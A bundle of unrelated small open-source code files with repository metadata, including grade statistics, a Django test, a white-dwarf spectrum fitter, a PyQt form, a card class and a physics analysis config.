| 2021-06-23T09:31:08.432654
| 2019-06-19T17:36:55
| 2019-06-19T17:36:55
| 137,112,992
| 4
| 0
|
MIT
| 2019-06-19T17:36:57
| 2018-06-12T18:35:50
|
Python
|
UTF-8
|
Python
| false
| false
| 169
|
py
|
def f(x):
return {'value': x}
def g(src):
return src, {}
def h(src, dst):
dst['computation'] = src['value'] * 2
def last_one(src, dst):
return dst
|
[
"jbn@abreka.com"
] |
jbn@abreka.com
|
e3d8013e33d572b49aff44454e400c499ce32db6
|
b4eff234e9faf8656a6012bbc36c4da3267e3a8a
|
/Laboratorium2/zad5_lib.py
|
bbd622f0b41b7544bc95cd47b0eff61ce09b14a7
|
[] |
no_license
|
rzeznia/pythonWSBpwjs
|
1ab339bb8f9c28840e40e5d7cf0afe0188a9184a
|
81e5df9a58e6b11d120bfd67fbf9054e52518bdc
|
refs/heads/master
| 2020-04-09T05:36:38.276884
| 2019-01-27T13:22:20
| 2019-01-27T13:22:20
| 160,071,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
from math import sqrt
def srednia(lista_ocen):
    """Arithmetic mean of the grades."""
    liczba_ocen = len(lista_ocen)
    return suma_ocen(lista_ocen) / liczba_ocen
def suma_ocen(lista_ocen):
    """Sum of the grades."""
    suma = 0
    for ocena in lista_ocen:
        suma += ocena
    return suma
def mediana(lista_ocen):
    """Median of the grades (assumes the list is already sorted)."""
    liczba_ocen = len(lista_ocen)
    cen = liczba_ocen // 2
    if liczba_ocen % 2 != 0:
        return lista_ocen[cen]
    else:
        return srednia([lista_ocen[cen-1], lista_ocen[cen]])
def odchylenie(lista_ocen):
    """Standard deviation; the variance is the mean squared deviation."""
    avg = srednia(lista_ocen)
    kwadrat_suma = 0
    for ocena in lista_ocen:
        kwadrat_suma += pow(ocena - avg, 2)
    wariancja = kwadrat_suma / len(lista_ocen)
    return sqrt(wariancja)
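# Illustrative check (assumed input, not from the original file):
# odchylenie([2, 4, 4, 4, 5, 5, 7, 9])  # -> 2.0 (mean 5, variance 4)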
|
[
"marcin.gd3@gmail.com"
] |
marcin.gd3@gmail.com
|
6f02326609f002098b509e1d2671a05d4d6e528b
|
fed0f32e035eb26c5acb84d9ee7626bf6e3c3d39
|
/Finding the multiple.py
|
5a87711d731a36421bf8d09e8bcb7702a6c20845
|
[] |
no_license
|
Suru996/SRM-e_lab-Python-Level-1
|
6f0ad4db94b3377d13b8bf92382294495c7fcee2
|
d69a93018d862e668cee76791c081df36a05f8e5
|
refs/heads/main
| 2023-07-27T12:13:10.743000
| 2021-08-22T10:19:50
| 2021-08-22T10:19:50
| 387,500,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
py
|
n = int(input())  # length of the list
b = []
for x in range(0, n):
    a = int(input())  # value from the user
    b.append(a)  # store each user-supplied value as an integer
k = int(input())  # print the multiples of k
for x in range(0, n):
    if b[x] % k == 0:
        print(b[x])
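# Sample run (hypothetical): n = 5, values 2 5 8 10 12, k = 2 -> prints 2, 8, 10, 12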
|
[
"noreply@github.com"
] |
Suru996.noreply@github.com
|
96bac37f424b77980856d7e2566c984015610ba9
|
b97f8bbc34d4b6d07e23eb86eb3e584f67dc90f2
|
/base_station/tests.py
|
61bdfcd87f90495f6c93cb301d1cd87446463de0
|
[
"Apache-2.0"
] |
permissive
|
EpicEric/base_stations_django
|
5f6a8df402cdae825bd9b67663cfbe66d93525dc
|
7a04bc78ebe59067e7ff117862c9d2b0182d5d13
|
refs/heads/master
| 2021-03-24T13:03:09.073738
| 2018-12-29T13:31:25
| 2018-12-29T13:31:25
| 122,376,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,314
|
py
|
from collections import Counter
from django.test import TestCase
from django.contrib.gis.geos import Point
from model_mommy import mommy
from base_station.models import IdentifiedBaseStation
class IdentifiedBaseStationTestCase(TestCase):
def test_one_bs_inside_bounds(self):
bs = mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5))
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(bs_within_box.first(), bs)
def test_some_bs_inside_and_some_outside_bounds(self):
bs_inside = [
mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(-46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.0, -23.9))]
bs_outside = [
mommy.make(IdentifiedBaseStation, point=Point(-47.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.3, -24.1))]
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(Counter(bs_within_box), Counter(bs_inside))
def test_get_covered_area(self):
#TODO
pass
|
[
"mateusnakajo@gmail.com"
] |
mateusnakajo@gmail.com
|
3f8f37c93b7b3054adec950e900f86e9dbe50c09
|
360f2f8489187e243f23fa552c36a89dd48d3795
|
/zadaca8.3.py
|
b9c5aa56718d37b71f1c9d148cbab3097b24046e
|
[] |
no_license
|
stanic-mia/Zadaca08
|
bfdd25e58f20ff69a4e41d0e6a16eb4345172f8e
|
7afe513cd2ec34e59e83eaf396bece78ab860131
|
refs/heads/main
| 2023-02-03T08:00:28.156554
| 2020-12-21T09:54:54
| 2020-12-21T09:54:54
| 323,285,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
brojA = int(input("Unesite prvi broj: "))
brojB = int(input("Unesite drugi broj: "))
operacija = input("Unesite računsku operaciju (+, -, *, /): ")
if operacija == "+":
print("Rezultat zbrajanja je: " + str(brojA + brojB))
elif operacija == "-":
print("Rezultat oduzimanja je: " + str(brojA - brojB))
elif operacija == "*":
print("Rezultat množenja je: " + str(brojA * brojB))
elif operacija == "/":
print("Rezultat dijeljenja je: " + str(brojA / brojB))
else:
print("Ne prepoznajem ovu računsku operaciju.")
|
[
"noreply@github.com"
] |
stanic-mia.noreply@github.com
|
767266bd140e0c8874953355ff300d128e4c125b
|
47dea5236f93d79a049e3de40a065ae5d0713e50
|
/mainEditarArrendatario.py
|
ce008c0622b3ce4ede4c7ceb38c9fe320cba4440
|
[] |
no_license
|
WilliamsScott/sicurezzaPy
|
d10548b6688dbfede9a4fcb5280f03987b0a5b30
|
76653773358249658865307defea8aa1ca7c1bfb
|
refs/heads/master
| 2020-06-03T04:52:08.705513
| 2019-06-11T20:58:26
| 2019-06-11T20:58:26
| 191,446,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,279
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainEditarArrendatario.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainEditarArrendatario(object):
def setupUi(self, MainEditarArrendatario):
MainEditarArrendatario.setObjectName("MainEditarArrendatario")
MainEditarArrendatario.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(MainEditarArrendatario)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(290, 20, 201, 41))
font = QtGui.QFont()
font.setPointSize(14)
self.label.setFont(font)
self.label.setObjectName("label")
self.txtRut = QtWidgets.QLineEdit(self.centralwidget)
self.txtRut.setGeometry(QtCore.QRect(280, 130, 251, 22))
self.txtRut.setObjectName("txtRut")
self.txtNombre = QtWidgets.QLineEdit(self.centralwidget)
self.txtNombre.setGeometry(QtCore.QRect(280, 170, 251, 22))
self.txtNombre.setObjectName("txtNombre")
self.txtApellido = QtWidgets.QLineEdit(self.centralwidget)
self.txtApellido.setGeometry(QtCore.QRect(280, 210, 251, 22))
self.txtApellido.setObjectName("txtApellido")
self.txtTelefono = QtWidgets.QLineEdit(self.centralwidget)
self.txtTelefono.setGeometry(QtCore.QRect(280, 250, 251, 22))
self.txtTelefono.setObjectName("txtTelefono")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(190, 250, 55, 16))
self.label_5.setObjectName("label_5")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(200, 210, 55, 16))
self.label_4.setObjectName("label_4")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(210, 126, 55, 20))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(200, 170, 55, 16))
self.label_3.setObjectName("label_3")
self.btnBuscar = QtWidgets.QPushButton(self.centralwidget)
self.btnBuscar.setGeometry(QtCore.QRect(550, 130, 93, 28))
self.btnBuscar.setObjectName("btnBuscar")
self.btnGuardar = QtWidgets.QPushButton(self.centralwidget)
self.btnGuardar.setGeometry(QtCore.QRect(560, 410, 93, 28))
self.btnGuardar.setObjectName("btnGuardar")
MainEditarArrendatario.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainEditarArrendatario)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 26))
self.menubar.setObjectName("menubar")
MainEditarArrendatario.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainEditarArrendatario)
self.statusbar.setObjectName("statusbar")
MainEditarArrendatario.setStatusBar(self.statusbar)
self.retranslateUi(MainEditarArrendatario)
QtCore.QMetaObject.connectSlotsByName(MainEditarArrendatario)
def retranslateUi(self, MainEditarArrendatario):
_translate = QtCore.QCoreApplication.translate
MainEditarArrendatario.setWindowTitle(_translate("MainEditarArrendatario", "MainWindow"))
self.label.setText(_translate("MainEditarArrendatario", "Editar Arrendatario"))
self.label_5.setText(_translate("MainEditarArrendatario", "Telefono"))
self.label_4.setText(_translate("MainEditarArrendatario", "Apellido"))
self.label_2.setText(_translate("MainEditarArrendatario", "Rut"))
self.label_3.setText(_translate("MainEditarArrendatario", "Nombre"))
self.btnBuscar.setText(_translate("MainEditarArrendatario", "Buscar"))
self.btnGuardar.setText(_translate("MainEditarArrendatario", "Guardar"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainEditarArrendatario = QtWidgets.QMainWindow()
ui = Ui_MainEditarArrendatario()
ui.setupUi(MainEditarArrendatario)
MainEditarArrendatario.show()
sys.exit(app.exec_())
|
[
"wmejias97@gmail.com"
] |
wmejias97@gmail.com
|
f4b603d1599486d77c94fb8d33f2757497d0a40f
|
a9113d2ef0ba68a5fb882a7b06954b58500589a1
|
/B10_T1_Sort_Lists.py
|
96ed2186e503e978b95a8f2d07ffc9c4d6f01493
|
[] |
no_license
|
karthiklingasamy/Python_Sandbox
|
4194f6bdfc13a62b6a43fc104354c428adb8f7c1
|
c1c352a220c76804609067c9f02945c535847378
|
refs/heads/master
| 2020-12-27T06:50:30.582174
| 2020-02-02T16:50:26
| 2020-02-02T16:50:26
| 237,802,723
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
li = [8,7,6,9,3,2,5,4,1]
print(li)
# To sort without affecting the original list, use the sorted() function
s_li = sorted(li)  # create a new variable to see the results
print('Sorted Variable:', s_li)
# To sort the original list in place, use the sort() method
li.sort()
print('Original Variable:', li)
# Difference between the sorted() function and the sort() method:
# the key takeaway is that sorted() returns a new sorted list, while sort() sorts in place and returns None
s_li = li.sort()
print(s_li)  # prints None
# Sort in descending order
s_li = sorted(li, reverse=True)
li.sort(reverse=True)
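# Hedged addition (not in the original): sorted() also accepts a key function,
# e.g. sorting by absolute value:
# sorted([-3, 1, -2], key=abs)  # -> [1, -2, -3]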
|
[
"noreply@github.com"
] |
karthiklingasamy.noreply@github.com
|
99bb55217063b4eccb9f79e6e03780c46df5d6a8
|
5297825412a061d7b44e4379c02f21f618c1c578
|
/maoyan/models.py
|
2b40aa65e8e6dccb74627c29311db1096ac0485d
|
[] |
no_license
|
xiaolifeidao123456/spider
|
63c2b8664ef98b84632e6a3b7493d0d5d0b1c3cd
|
b02958d06b5f8b91fc6fc6de2a8f331ae764418d
|
refs/heads/master
| 2020-03-29T04:50:26.405292
| 2018-09-20T11:04:23
| 2018-09-20T11:07:30
| 149,551,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
# import scrapy
#
# class MovieItem(scrapy.Item):
#     # movie title
#     title = scrapy.Field()
#     # lead actors
#     start = scrapy.Field()
#     # release date
#     releasetime = scrapy.Field()
|
[
"1062959398@qq.com"
] |
1062959398@qq.com
|
3d4a418da0e12ece71efa3b7f76035ee453690bd
|
811a15aceb8f35fa738fa01e30e5003460715706
|
/DA_fitter.py
|
db47929e9a2eb5679d0d18ad6b8e96344aa8268f
|
[] |
no_license
|
CManser/WD_MWS_pipeline
|
2e3660e3504f261f3daf74fdacb8762c215a61d8
|
99ef0b73d842dfda072f902745635a99b9453991
|
refs/heads/master
| 2021-03-02T14:54:29.652384
| 2020-03-08T19:43:49
| 2020-03-08T19:43:49
| 245,876,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,998
|
py
|
import MWS_WD_scripts
import numpy as np
import sys
import matplotlib.pyplot as plt
import os
import scipy.interpolate
c = 299792.458 # Speed of light in km/s
stdwave = np.arange(3000,11000.1, 0.1)
inp = sys.argv[1]
name = inp.split('/')[-1]
file_path = inp[:-1*len(name)]
print('\n' + name)
filename = inp
name_r, name_z = filename.replace('-b', '-r'), filename.replace('-b', '-z')
spectra_b = np.loadtxt(filename,usecols=(0,1,2),unpack=True).transpose()
spectra_b[:,2] = spectra_b[:,2]**-0.5
spectra_r = np.loadtxt(name_r,usecols=(0,1,2),unpack=True).transpose()
spectra_r[:,2] = spectra_r[:,2]**-0.5
spectra_z = np.loadtxt(name_z,usecols=(0,1,2),unpack=True).transpose()
spectra_z[:,2] = spectra_z[:,2]**-0.5
training_set = MWS_WD_scripts.load_training_set()
WD_type = MWS_WD_scripts.WD_classify(spectra_b, spectra_r, training_set = training_set)
print(WD_type[0])
best_T, best_T_err, best_g, best_g_err, best_rv, s_best_T, s_best_T_err, s_best_g, s_best_g_err, StN = MWS_WD_scripts.fit_DA(spectra_b[(np.isnan(spectra_b[:,1])==False) & (spectra_b[:,0]>3500)], plot = True, verbose_output = True)
modwave = stdwave*(best_rv+c)/c
model = MWS_WD_scripts.interpolating_model_DA(best_T,best_g/100, fine_models = True)
model2 = MWS_WD_scripts.interpolating_model_DA(s_best_T,s_best_g/100, fine_models = True)
# Plotting
fig = plt.figure(figsize= (11,9))
axes1 = fig.add_axes([0,0.45,1,0.55])
axes2 = fig.add_axes([0,0,1,0.4])
axes1.text(0.45, 0.95, name[:-6], transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.90, 'T = {:.1f} +/- {:.1f} K | logg = {:.3f} +/- {:.3f}'.format(best_T, best_T_err, best_g/100, best_g_err/100), transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.85, 'T2 = {:.1f} +/- {:.1f} K | logg2 = {:.3f} +/- {:.3f}'.format(s_best_T, s_best_T_err, s_best_g/100, s_best_g_err/100), transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.80, 'rv = {:.2f} km/s | S/N = {:.1f}'.format(best_rv, StN), transform=axes1.transAxes, fontsize = 14)
axes1.plot(spectra_b[:,0], spectra_b[:,1], color = '0.2', lw = 1.0)
axes1.plot(spectra_r[:,0], spectra_r[:,1], color = '0.3', lw = 1.0)
axes1.plot(spectra_z[:,0], spectra_z[:,1], color = '0.3', lw = 1.0)
check_f_spec=spectra_b[:,1][(spectra_b[:,0]>4500.) & (spectra_b[:,0]<4700.)]
model[np.isnan(model)] = 0.0
check_f_model = model[(modwave > 4500) & (modwave < 4700)]
adjust = np.average(check_f_model)/np.average(check_f_spec)
axes1.plot(modwave[(modwave > 3600.0) & (modwave < 10500.0)], model[(modwave > 3600.0) & (modwave < 10500.0)]/adjust, color = 'red', alpha = 0.9, lw = 0.8)
model2[np.isnan(model2)] = 0.0
check_f_model2 = model2[(modwave > 4500) & (modwave < 4700)]
adjust2 = np.average(check_f_model2)/np.average(check_f_spec)
axes1.plot(modwave[(modwave > 3600.0) & (modwave < 10500.0)], model2[(modwave > 3600.0) & (modwave < 10500.0)]/adjust2, color = 'blue', alpha = 0.7, lw = 0.8)
axes1.set_ylabel('Flux',fontsize=12)
axes2.set_xlabel('Wavelength (Angstroms)',fontsize=12)
axes1.set_xlim(3500, 10600)
axes2.set_xlim(3500, 10600)
axes2.set_ylim(0.2, 1.8)
func = scipy.interpolate.interp1d(modwave, model)
model_b = func(spectra_b[:,0])
model_r = func(spectra_r[:,0])
model_z = func(spectra_z[:,0])
func2 = scipy.interpolate.interp1d(modwave, model2)
model2_b = func2(spectra_b[:,0])
model2_r = func2(spectra_r[:,0])
model2_z = func2(spectra_z[:,0])
axes2.plot(spectra_b[:,0], spectra_b[:,1]/model_b*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_r[:,0], spectra_r[:,1]/model_r*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_z[:,0], spectra_z[:,1]/model_z*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_b[:,0], spectra_b[:,1]/model2_b*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.plot(spectra_r[:,0], spectra_r[:,1]/model2_r*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.plot(spectra_z[:,0], spectra_z[:,1]/model2_z*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.axhline(1, ls = '--', lw = 0.5, color = '0.3')
save_path = file_path + '/fits/'
if not os.path.isdir(save_path):
try:
os.mkdir(save_path)
except OSError:
print('Could not make path {:s}'.format(save_path))
else:
print ("Successfully created the directory {:s}".format(save_path))
plt.savefig('{:s}{:s}_fitted.pdf'.format(save_path,name[:-6]), bbox_inches = 'tight')
plt.close()
if (StN > 10.0) & (WD_type == 'DA'):
compare_b = np.vstack((spectra_b[:,0], spectra_b[:,1]/model_b*adjust, spectra_b[:,2]/model_b*adjust)).transpose()
compare_r = np.vstack((spectra_r[:,0], spectra_r[:,1]/model_r*adjust, spectra_r[:,2]/model_r*adjust)).transpose()
compare_z = np.vstack((spectra_z[:,0], spectra_z[:,1]/model_z*adjust, spectra_z[:,2]/model_z*adjust)).transpose()
np.savetxt('{:s}{:s}-b_compare.dat'.format(save_path,name[:-6]), compare_b)
np.savetxt('{:s}{:s}-r_compare.dat'.format(save_path,name[:-6]), compare_r)
np.savetxt('{:s}{:s}-z_compare.dat'.format(save_path,name[:-6]), compare_z)
#plt.show()
|
[
"noreply@github.com"
] |
CManser.noreply@github.com
|
e098d6c21f58e58491d74aa19724a3243abf4a13
|
915ea8bcabf4da0833d241050ef226100f7bd233
|
/SDKs/Python/test/test_add_contact_log_type.py
|
f6cd3f13996b307b1bf6cb61f610404ecbbae465
|
[
"BSD-2-Clause"
] |
permissive
|
parserrr/API-Examples
|
03c3855e2aea8588330ba6a42d48a71eb4599616
|
0af039afc104316f1722ee2ec6d2881abd3fbc07
|
refs/heads/master
| 2020-07-10T22:17:24.906233
| 2019-08-26T03:06:21
| 2019-08-26T03:06:21
| 204,382,917
| 0
| 0
| null | 2019-08-26T02:48:16
| 2019-08-26T02:48:15
| null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
# coding: utf-8
"""
MINDBODY Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.add_contact_log_type import AddContactLogType # noqa: E501
from swagger_client.rest import ApiException
class TestAddContactLogType(unittest.TestCase):
"""AddContactLogType unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAddContactLogType(self):
"""Test AddContactLogType"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.add_contact_log_type.AddContactLogType() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"christopher.volpi@mindbodyonline.com"
] |
christopher.volpi@mindbodyonline.com
|
8075009ac3e6a2b508e0c69650729de3d981023f
|
cdd43e5400d93e406bcea9b3b332e416f09cbb2a
|
/card.py
|
7ad7121cc826cac891c26dff0831d01b25eb54dd
|
[] |
no_license
|
shruti420/War
|
3580670ed1d0690c635cb0ebbfa2ac91e4ff1d91
|
10072cbe32aae2ae46987eb135ca7b07ad1baacf
|
refs/heads/main
| 2023-06-30T13:29:48.431548
| 2021-08-01T19:17:13
| 2021-08-01T19:17:13
| 391,712,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
class Card:
suits = ["spades", "hearts","diamonds","clubs"]
values=[None, None, "2","3","4","5","6","7","8","9","10","Jack","Queen","King", "Ace"]
def __init__(self,v,s):
""" suit + value are ints"""
self.value=v
self.suit=s
    def __lt__(self, c2):
        if self.value < c2.value:
            return True
        if self.value == c2.value:
            if self.suit < c2.suit:
                return True
            else:
                return False
        return False
def __gt__(self, c2):
if self.value >c2.value:
return True
if self.value== c2.value:
if self.suit>c2.suit:
return True
else:
return False
return False
def __repr__(self):
        v = self.values[self.value] + " of " + self.suits[self.suit]
return v
card1= Card(10,2)
card2 = Card(11,3)
print(card1 < card2)
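# Hedged addition (not in the original): with the " of " spacing above,
# print(card1) would show '10 of diamonds'.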
|
[
"noreply@github.com"
] |
shruti420.noreply@github.com
|
2815b4c6b972718b4f6cde4c85bc7f35594f15dd
|
57a3a9065ff67eb57eb24fe1615aad41bbc916be
|
/configs/categories_config_vtag_Bacon_nomet.py
|
826bfd0c32ff97b4db5a3eafb9c4ae481f3fcc7d
|
[] |
no_license
|
blallen/DmsMonoX
|
2eb1b6bc415c6f4ceff3ec803c2de662b8470156
|
5dd52783032f536335e492a0931764650d690571
|
refs/heads/master
| 2020-12-30T23:21:34.757629
| 2015-02-24T15:06:21
| 2015-02-24T15:06:21
| 37,859,155
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,905
|
py
|
# Configuration for the Mono-X categories
out_file_name = 'mono-x-vtagged.root'
BINS = [250.0 , 260.0 , 270.0 , 280.0 , 290.0 , 300.0 , 310.0 , 320.0 , 330.0,340,360,380,420,510,1000]
BINS = range(250,550,50)  # overrides the fine binning above with a coarser one
BINS.append(1000)
categories = [
{
'name':"resolved"
,'in_file_name':"resolved-combo.root"
,"cutstring":"mvamet>250 && mvamet<1000"
,"varstring":["mvamet",250,1000]
,"weightname":"weight"
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":1
,"bins":BINS[:]
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
# photon control
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
}
,"metsamples": # For Recoil Corrections
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
},
{
'name':"boosted"
,'in_file_name':"boosted-combo.root"
,"cutstring":"mvamet>250 && mvamet<1000"
,"varstring":["mvamet",250,1000]
,"weightname":"weight"
,"bins":BINS[:]
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":0
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
#,"GV_signal" :['signal','gv',1,0]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
#,"GV_di_muon_control" :['dimuon','gv',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
#,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
#,"GV_single_muon_control" :['singlemuon','gv',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
},
"metsamples":
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
